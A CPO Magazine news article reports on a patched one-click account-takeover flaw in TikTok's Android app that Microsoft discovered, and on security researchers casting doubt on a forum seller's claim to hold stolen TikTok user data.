CPO Magazine - News, Insights and Resources for Data Protection, Privacy and Cyber Security Leaders
CPO Magazine - News, Insights and Resources for Data Protection, Privacy and Cyber Security Leaders
  • Home
  • News
  • Insights
  • Resources
Logo of TikTok in the reflection of a broken mirror showing TikTok hack and account takeover
Cyber SecurityNews
·3 min read

“One-Click” TikTok Hack Discovered That Put 2 Billion App Users at Risk, but No Reports Yet of Account Takeover in the Wild

Scott Ikeda·September 8, 2022

A severe “one-click” TikTok hack that Microsoft discovered and reported to the social media giant was reportedly patched without incident, but a hacker has popped up on an underground forum to claim that they have stolen data for sale. The attack impacts the Android app version of the service and allows for an account takeover when a victim clicks on a malicious URL.

If the hacker’s story is to be believed, the information from two billion profiles could have been stolen. However, the evidence is thin at this point. Microsoft says that there is no evidence that the TikTok hack was ever used in the wild, and TikTok says that it has found no evidence of a breach.

TikTok hack put billions of accounts at risk, but evidence of public exposure remains thin

Microsoft’s 365 Defender Research Team discovered the account takeover vulnerability and reported it to TikTok in February of this year, but only recently disclosed it to the public. TikTok said that it patched the issue immediately after becoming aware of it. The vulnerability is present in versions of the Android app prior to 23.7.3, and TikTok users with automatic updates enabled (or those that have downloaded the app since March 2022) should already be protected. It was also present in all global versions of the app, including the ones specifically designed for select nations in Asia.

The vulnerability was considered “high severity” at the time and has since received a score of 8.8 from the National Institute of Standards and Technology (NIST). The TikTok hack allowed the attacker to load an arbitrary URL to the app’s WebView, which in turn allowed access to WebView’s JavaScript bridges opening a path to a full account takeover by capturing the user’s authentication token. If a user clicked on the malicious link, the attacker could assume full control of their profile to include uploading videos and messaging other users.

After account takeover bug reported, hacker claims exposed data for over a billion users, offers it for sale

Initially it appeared that this was a simple case of a serious vulnerability being discovered internally, patched and then acknowledged when it was safe months after the fact. Then a threat actor popped up on an underground forum claiming that they had exploited a TikTok hack that had allowed them to steal 34GB of user data.

It is not entirely clear if the attacker is claiming use of the account takeover vulnerability to steal the data, but they purported to have about 1.37 billion user records for sale (nearly the total count of estimated Android app users) and appeared with the offer not long after the vulnerability was disclosed to the public.

The offer appeared on the underground “Breach Forums” message board, posted by a user calling themselves “AgainstTheWest.” They indicated that they were considering either selling the data or simply dumping it to the public.

Security researchers are not convinced that this came from a legitimate TikTok hack or that account takeovers were involved, however, at least at first look at the available evidence. Have I Been Pwned owner Troy Hunt, a professional security researcher, analyzed the 237 MB sample of data the threat actor provided and did not see clear evidence tying it to a new breach. He said that some of the included data was already publicly available, and other portions of it were junk or test data.

Davey Winder, security researcher and senior cybersecurity contributor for Forbes, recently conducted a deeper dive into the purported TikTok hack and echoed the results of the Have I Been Pwned analysis. Winder added that the data included in the sample appeared to come from a third-party marketing firm that works with TikTok, something that has since been supported by statements from TikTok themselves. Bob Diachenko, another prominent cybersecurity analyst, has added that he believes the data came from a marketing company based in Hangzhou City, China. It is unclear exactly how much user information this firm had access to.

Though there are not yet any signs of successful account takeover and TikTok is not recommending any special security steps at this time, users may want to enable two-factor authentication (2FA) on their accounts out of an abundance of caution. TikTok is coming off of a potentially more concerning incident over the summer, in which it was revealed that engineers in China have extensive access to foreign user accounts despite promises from the company that would no longer happen. TikTok also experienced a third-party data leak in 2020, though this included profiles from other services such as Instagram and YouTube and did not potentially impact nearly as much of its user base.

 

Tags
Account TakeoverData BreachTikTok Hack
Scott Ikeda
Senior Correspondent at CPO Magazine
Scott Ikeda is a technology futurist and writer for more than 15 years. He travels extensively throughout Asia and writes about the impact of technology on the communities he visits. Over the last 5 years, Scott has grown increasingly focused on the future landscape of big data, surveillance, cybersecurity and the right to privacy.
Related
Open digital lock showing data breach at data broker
Cyber SecurityNews

Controversial Data Broker LexisNexis Data Breach Impacts Over 364,000 People

June 4, 2025
Hacker touching digital lock showing legal aid data breach
Cyber SecurityNews

Legal Aid Data Breach Leaks Millions of Sensitive Records, MoJ’s Poor Cybersecurity Practices Slammed

May 28, 2025
Hands typing on keyboard with unlocked padlock showing data breach from cyber attack
Cyber SecurityNews

French Luxury Giant Dior Confirms Data Breach after a Cyber Attack

May 21, 2025
Coinbase crypto exchange on screen showing data breach
Cyber SecurityNews

Coinbase Crypto Exchange Reports Losses of Up to $400 Million After Data Breach

May 19, 2025
Access granted screen on monitor showing data breach
Cyber SecurityNews

Education Giant Pearson Confirms Customer Data Breach After Cyber Attack

May 15, 2025
Keyboard with red backlight showing LockBit ransomware data breach
Cyber SecurityNews

LockBit Ransomware Suffers Its Own Data Breach, Internal Conversations With Victims Leaked

May 14, 2025
NASCAR race showing data breach by ransomware gang
Cyber SecurityNews

Medusa Ransomware Gang Claims NASCAR Data Breach Leaking Over 1 Terabyte of Sensitive Information

April 24, 2025
Traffic jam in evening showing data breach of file sharing platform
Cyber SecurityNews

Hertz Confirms Data Breach from Cleo Managed File Sharing Platform Zero-Day Vulnerabilities

April 23, 2025

Latest

Criminal talking on the phone showing vishing attacks

Google Warns Salesforce Customers of Large-Scale Vishing Attacks

Google logo showing certificate authorities

Google to Distrust Two Certificate Authorities Over Compliance Issues

Hands typing on keyboard showing security incident

Victoria’s Secret Security Incident Shuts Down Lingerie Giant’s Systems

Cars waiting on the road showing vehicle security

Balancing Safety and Security in Software-Defined Vehicles

Learn More

About
Contact
Our Advertising
Privacy Policy
Cookie Policy
Terms of Use

CPO Magazine

News, insights and resources for data protection, privacy and cyber security professionals.

Learn More

About
Contact
Our Advertising
Privacy Policy
Cookie Policy
Terms of Use

Categories

Data Privacy
Data Protection
Cyber Security
Tech
Insights
News
Resources
Press Releases

© 2024 Rezonen Pte. Ltd.
CPO Magazine - News, Insights and Resources for Data Privacy, Protection and Cybersecurity Leaders
  • Home
  • News
  • Insights
  • Resources
    Start typing to see results or hit ESC to close
    Data Breach U.S. Regulations Cyber Attack EU GDPR
    See all results